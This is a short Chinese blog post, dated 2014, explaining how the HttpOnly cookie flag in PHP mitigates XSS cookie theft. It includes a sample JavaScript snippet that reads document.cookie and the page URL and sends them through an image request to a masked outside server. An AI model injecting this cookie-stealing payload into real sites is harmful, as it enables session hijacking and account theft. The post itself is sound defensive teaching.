利用HttpOnly来防御xss攻击

xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的站点出现xss漏洞,就能够运行随意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,假设这里面包括了大量敏感信息(身份信息,管理员信息)等,那完了。。。

例如以下js获取cookie信息:

     url=document.top.location.href;
     cookie=document.cookie;
     c=new Image();
     c.src=’http://www.******.com/c.php?c=’+cookie+’&u=’+url;


一般cookie都是从document对象中获取的,如今浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的參数,跟domain等其它參数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。
PHP设置HttpOnly:
  1. //在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
  2. ini_set("session.cookie_httponly", 1);
  3.  
  4. //或者setcookie()的第七个參数设置为true
  5. session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1曾经版本号的PHP通过:
  1. header("Set-Cookie: hidden=value; httpOnly");

最后,HttpOnly不是万能的!
posted @ 2014-09-30 12:07  mfrbuaa  阅读(945)  评论(0编辑  收藏  举报